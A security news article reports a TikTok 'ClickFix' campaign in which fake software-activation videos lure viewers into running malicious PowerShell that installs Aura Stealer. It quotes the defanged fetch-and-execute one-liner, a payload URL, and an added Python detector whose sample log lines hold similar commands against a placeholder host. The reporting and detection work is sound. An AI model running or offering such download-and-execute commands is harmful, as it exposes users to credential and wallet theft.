Cybercriminals are using TikTok videos disguised as free activation guides for popular software like Windows, Spotify, and Netflix to spread information-stealing malware.
ISC Handler Xavier Mertens spotted the ongoing campaign, which is largely the same as the one observed by Trend Micro in May.
The TikTok videos seen by BleepingComputer pretend to offer instructions on how to activate legitimate products like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as made-up services such as Netflix and Spotify Premium.
[Image] Source: BleepingComputer.com
The videos perform a ClickFix attack, a social engineering technique that offers what appear to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.
Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell:
iex (irm slmgr[.]win/photoshop)
It should be noted that the program name in the URL differs depending on the program being impersonated. For example, in the fake Windows activation videos, instead of the URL containing photoshop, it would include windows.
In this campaign, when the command is executed, PowerShell connects to the remote site slmgr[.]win to retrieve and execute another PowerShell script.
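The one-liner above has a shape that a defender can hunt for: Invoke-Expression (or its alias iex) fed directly with content fetched from the network by Invoke-RestMethod (irm), Invoke-WebRequest (iwr) or a DownloadString call. The following Python is an added example written for this page, not code from the original article, from Mertens or from ISC. It scans constructed log lines in the shape of PowerShell script-block logging (Event ID 4104) entries; the hostnames and the domain malicious.example in the sample are placeholders, not indicators from the campaign, and the log line format is an assumed simplification of what a SIEM would export.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample lines in the shape of PowerShell script-block logging
# (Event ID 4104) entries. Hostnames and the domain "malicious.example" are
# placeholders invented for this example, not indicators from the article.
SAMPLE_LOGS = [
    'Event 4104 Host=WS01 ScriptBlockText="iex (irm malicious.example/photoshop)"',
    'Event 4104 Host=WS02 ScriptBlockText="Invoke-Expression (Invoke-RestMethod -Uri http://malicious.example/windows)"',
    'Event 4104 Host=WS03 ScriptBlockText="Get-ChildItem C:\\Users | Format-Table"',
    'Event 4104 Host=WS04 ScriptBlockText="$r = irm https://api.example/status; Write-Output $r.ok"',
    'Event 4104 Host=WS05 ScriptBlockText="IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.example/p\')"',
    'Event 4104 Host=WS06 ScriptBlockText="irm malicious.example/spotify | iex"',
]

# Assumed export format: "Event <id> Host=<name> ScriptBlockText="<script>"".
LINE_RE = re.compile(
    r'^Event (?P<id>\d+) Host=(?P<host>\S+) ScriptBlockText="(?P<script>.*)"$'
)

# Invoke-Expression and its alias, and the common primitives for pulling
# content off the network. Matching is case-insensitive because PowerShell is.
INVOKE_EXPR = r"(?:\biex\b|\binvoke-expression\b)"
REMOTE_FETCH = (
    r"(?:\birm\b|\binvoke-restmethod\b|\biwr\b|\binvoke-webrequest\b|\bdownloadstring\b)"
)
REMOTE_EVAL_RE = re.compile(
    rf"{INVOKE_EXPR}\s*\(.*?{REMOTE_FETCH}"    # iex (irm ...), IEX (...).DownloadString(...)
    rf"|{REMOTE_FETCH}.*?\|\s*{INVOKE_EXPR}",  # irm ... | iex
    re.IGNORECASE,
)


@dataclass
class Finding:
    host: str
    script: str
    reason: str


def parse_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (host, script block) for a well-formed line, else None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return m.group("host"), m.group("script")


def is_remote_eval(script: str) -> bool:
    """True when the script block evaluates content fetched from the network."""
    return REMOTE_EVAL_RE.search(script) is not None


def scan(lines: List[str]) -> List[Finding]:
    """Flag script blocks that hand remotely fetched text to Invoke-Expression."""
    findings: List[Finding] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed line: skip it rather than abort the sweep
        host, script = parsed
        if is_remote_eval(script):
            findings.append(
                Finding(
                    host,
                    script,
                    "Invoke-Expression over remotely fetched content (ClickFix-style one-liner)",
                )
            )
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.host}: {f.reason}\n    {f.script}")
```

Running the block flags WS01, WS02, WS05 and WS06. WS04 is deliberately left alone: it calls Invoke-RestMethod but never evaluates the response, and legitimate administration scripts do that constantly, so the rule keys on the combination of a network fetch and Invoke-Expression rather than on either primitive by itself. Script-block logging has to be enabled on the endpoints for lines like these to exist at all.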
This script downloads two executables from Cloudflare Pages, with the first executable downloaded from https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. This executable is a variant of the Aura Stealer information-stealing malware.
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.
Mertens says that an additional payload will be downloaded, named source.exe [VirusTotal], which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe). This code is then injected and launched in memory.
The purpose of the additional payload remains unclear.
Users who performed these steps should consider all of their credentials compromised and immediately reset their passwords on all sites they use.
ClickFix attacks have become very popular over the past year, used to distribute various malware strains in ransomware and cryptocurrency theft campaigns.
As a general rule, users should never copy text from a website and run it in an operating system dialog box, including within the File Explorer address bar, command prompt, PowerShell prompts, macOS terminal, and Linux shells.